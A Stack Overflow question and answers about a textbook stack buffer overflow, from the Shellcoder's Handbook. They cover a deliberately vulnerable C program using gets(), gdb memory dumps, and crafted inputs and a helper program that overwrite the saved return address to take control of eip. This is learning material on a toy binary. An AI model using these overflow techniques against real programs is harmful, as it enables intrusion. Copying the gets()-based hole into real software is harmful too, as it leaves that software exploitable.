# stack overflow (shellcoders handbook)

Tags: c, gdb, stack-overflow

I was taking at this example w.r.t. shellcoder's handbook(second edition), and have some question about the stack

```
root@bt:~/pentest# gdb -q sc  
Reading symbols from /root/pentest/sc...done.  
(gdb) set disassembly-flavor intel    
(gdb) list    
1   void ret_input(void){    
2       char array[30];  
3     
4       gets(array);  
5       printf("%s\n", array);  
6   }  
7   main(){  
8       ret_input();  
9     
10      return 0;  
(gdb) disas ret_input   
Dump of assembler code for function ret_input:  
   0x08048414 <+0>: push   ebp  
   0x08048415 <+1>: mov    ebp,esp  
   0x08048417 <+3>: sub    esp,0x24  
   0x0804841a <+6>: lea    eax,[ebp-0x1e]  
   0x0804841d <+9>: mov    DWORD PTR [esp],eax  
   0x08048420 <+12>:    call   0x804832c <gets@plt>  
   0x08048425 <+17>:    lea    eax,[ebp-0x1e]  
   0x08048428 <+20>:    mov    DWORD PTR [esp],eax  
   0x0804842b <+23>:    call   0x804834c <puts@plt>  
   0x08048430 <+28>:    leave    
   0x08048431 <+29>:    ret      
End of assembler dump.  
(gdb) break *0x08048420  
Breakpoint 1 at 0x8048420: file sc.c, line 4.  
(gdb) break *0x08048431  
Breakpoint 2 at 0x8048431: file sc.c, line 6.  
(gdb) run  
Starting program: /root/pentest/sc   

Breakpoint 1, 0x08048420 in ret_input () at sc.c:4  
4       gets(array);  
(gdb) x/20x $esp  
0xbffff51c: 0xbffff522  0xb7fca324  0xb7fc9ff4  0x08048460  
0xbffff52c: 0xbffff548  0xb7ea34a5  0xb7ff1030  0x0804846b  
0xbffff53c: 0xb7fc9ff4  0xbffff548  0x0804843a  0xbffff5c8  
0xbffff54c: 0xb7e8abd6  0x00000001  0xbffff5f4  0xbffff5fc  
0xbffff55c: 0xb7fe1858  0xbffff5b0  0xffffffff  0xb7ffeff4  
(gdb) continue   
Continuing.  
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDD  
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDD  

Breakpoint 2, 0x08048431 in ret_input () at sc.c:6  
6   }  
(gdb) x/20x 0x0bffff51c  
0xbffff51c: 0xbffff522  0x4141a324  0x41414141  0x41414141  
0xbffff52c: 0x42424242  0x42424242  0x43434242  0x43434343  
0xbffff53c: 0x43434343  0x44444444  0x44444444  0xbffff500  
0xbffff54c: 0xb7e8abd6  0x00000001  0xbffff5f4  0xbffff5fc  
0xbffff55c: 0xb7fe1858  0xbffff5b0  0xffffffff  0xb7ffeff4  
(gdb) ^Z  
[1]+  Stopped                 gdb -q sc  
root@bt:~/pentest# printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" | ./sc   
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD5�  
AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD:�  
root@bt:~/pentest#
```

in this example i was taking 48 bytes "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" that to rewrite ret address, and all is work. But when i tried to use example from first edition of this book, i faced with some problem

```
root@bt:~/pentest# gdb -q sc  
Reading symbols from /root/pentest/sc...done.  
(gdb) disas ret_input   
Dump of assembler code for function ret_input:  
   0x08048414 <+0>: push   %ebp  
   0x08048415 <+1>: mov    %esp,%ebp  
   0x08048417 <+3>: sub    $0x24,%esp  
   0x0804841a <+6>: lea    -0x1e(%ebp),%eax  
   0x0804841d <+9>: mov    %eax,(%esp)  
   0x08048420 <+12>:    call   0x804832c <gets@plt>  
   0x08048425 <+17>:    lea    -0x1e(%ebp),%eax  
   0x08048428 <+20>:    mov    %eax,(%esp)   
   0x0804842b <+23>:    call   0x804834c <puts@plt>  
   0x08048430 <+28>:    leave    
   0x08048431 <+29>:    ret      
End of assembler dump.  
(gdb)
```

why program has taken 24(hex)=36(dec)bytes for array, but i used 48 that rewrite, 36 bytes of array, 8 bytes of esp and ebp(how i know), but there are steel have 4 unexplained bytes

ok, lets try out the sploit from first edition of book who rewrite all of array by address of call function, in book they had "sub &0x20,%esp" so code is

```
main(){  
 int i=0;  
 char stuffing[44];  

 for (i=0;i<=40;i+=4) 
 *(long *) &stuffing[i] = 0x080484bb;  
 puts(array);
```

i have ""sub &0x24,%esp" so my code will be

```
main(){  
 int i=0;  
 char stuffing[48];  

 for (i=0;i<=44;i+=4)
 *(long *) &stuffing[i] = 0x08048435;  
 puts(array);
```

result of the shellcoders' handbook

```
 [root@localhost /]# (./adress_to_char;cat) | ./overflow  
input   
""""""""""""""""""a<u___.input  
input  
input
```

and my result

```
root@bt:~/pentest# (./ad_to_ch;cat) | ./sc  
5�h���ل$���������h����4��0��˄  
inout  
Segmentation fault  
root@bt:~/pentest#
```

What's problem? 
i was compiling with

> -fno-stack-protector -mpreferred-stack-boundary=2

Answer (score 3):

I suggest you better get the amount of bytes necessary to overflow the buffer by trying in GDB. I compiled the source you provided in your question and ran it through GDB:

```
gdb$ r < <(python -c "print('A'*30)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[Inferior 1 (process 29912) exited normally]
```

(Do note that I use Python to create my input instead of a compiled C program. It really does not matter, use what you prefer.)

So 30 bytes are fine. Let's try some more:

```
gdb$ r < <(python -c "print('A'*50)")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x41414141
0x41414141 in ?? ()

gdb$ i r $eip
eip            0x41414141   0x41414141
```

Our `eip` register now contains `0x41414141`, which is `AAAA` in ASCII. Now, we can gradually check where exactly we have to place the value in our buffer that updates `eip`:

```
gdb$ r < <(python -c "print('A'*40+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x8004242
0x08004242 in ?? ()
```

`B` is `0x42`. Thus, we overwrote half of `eip` when using 40 `A`'s and four `B`'s. Therefore, we pad with 42 `A`'s and then put the value we want to update `eip` with:

```
gdb$ r < <(python -c "print('A'*42+'BBBB')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB

Program received signal SIGSEGV, Segmentation fault.
Cannot access memory at address 0x42424242
0x42424242 in ?? ()
```

We got full control over `eip`! Let's try it. Set a breakpoint at the end of `ret_input` (your addresses may vary as I recompiled the binary):

```
gdb$ dis ret_input
Dump of assembler code for function ret_input:
   0x08048404 <+0>: push   %ebp
   0x08048405 <+1>: mov    %esp,%ebp
   0x08048407 <+3>: sub    $0x38,%esp
   0x0804840a <+6>: lea    -0x26(%ebp),%eax
   0x0804840d <+9>: mov    %eax,(%esp)
   0x08048410 <+12>:    call   0x8048310 <gets@plt>
   0x08048415 <+17>:    lea    -0x26(%ebp),%eax
   0x08048418 <+20>:    mov    %eax,(%esp)
   0x0804841b <+23>:    call   0x8048320 <puts@plt>
   0x08048420 <+28>:    leave  
   0x08048421 <+29>:    ret    
End of assembler dump.
gdb$ break *0x8048421
Breakpoint 1 at 0x8048421
```

As an example, let's modify `eip` so once returning from `ret_input` we end up at the beginning of the function again:

```
gdb$ r < <(python -c "print('A'*42+'\x04\x84\x04\x08')")
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�    

--------------------------------------------------------------------------[code]
=> 0x8048421 <ret_input+29>:    ret    
   0x8048422 <main>:    push   ebp
   0x8048423 <main+1>:  mov    ebp,esp
   0x8048425 <main+3>:  and    esp,0xfffffff0
   0x8048428 <main+6>:  call   0x8048404 <ret_input>
   0x804842d <main+11>: mov    eax,0x0
   0x8048432 <main+16>: leave  
   0x8048433 <main+17>: ret    
--------------------------------------------------------------------------------

Breakpoint 1, 0x08048421 in ret_input ()
```

We pad 42 `A`'s and then append the address of `ret_input` to our buffer. Our breakpoint on the `ret` triggers.

```
gdb$ x/w $esp
0xffffd30c: 0x08048404
```

On top of the stack there's the last DWORD of our buffer - `ret_input`'s address.

```
gdb$ n
0x08048404 in ret_input ()    

gdb$ i r $eip
eip            0x8048404    0x8048404 <ret_input>
```

Executing the next instruction pops that value off the stack and sets `eip` accordingly.

On a side note: I recommend the .gdbinit file from [this guy](http://reverse.put.as).

Comment: i already overwrote this source via gdb/command promt, and need to overwrite via another source
`root@bt:~/pentest# printf` `"AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD\x35\x84\x04\x08" | ./sc`  
`AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD5�` 
`AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDD:�`
`root@bt:~/pentest#`

Comment: I am not quite sure what you are trying to accomplish. Could you rephrase what your goal is?
It is probably also a good idea to upload the binary files you are working on in order to avoid discrepancies.

Comment: My goal is try to overflow [my program](http://code.google.com/p/example-of-buffer-overflow/downloads/detail?name=sc.c&can=2&q=#makechanges) via [this code](http://code.google.com/p/example-of-buffer-overflow/downloads/detail?name=ad_to_ch.c&can=2&q=). Thanks for helping

Comment: `main()
{
    int i = 0;
    char stuf[50];

    for (i = 0; i <= 48; i += 4)
        *(long*)(stuf + i) = 0x08048435;

    puts(stuf);
}`

Compile this (`ad_to_ch`), then in GDB set your breakpoint at the end of `ret_input` and run the program using your tool: `r < <(./ad_to_ch)`. It should work the same as pointed out above using Python instead.

Answer (score 1):

This row :

for (i=o;i<=44;i+=4);

Remove the `;` from the end. I also assume that the `o`(letter o) instead of 0(zero) is mistyped here.

The problem is that your for loop is executing `;` (a.k.a. do nothing) until i becomes larger then 44, **and then** you execute the next command with `i = 44` wich is outside the bounds of array and you get `Segmentation Error`. You should watch out for this type of error as it is hardly visible and it is completely valid c code.

Comment: Sorry for my literal error, simply i wrote code by hand (corrected).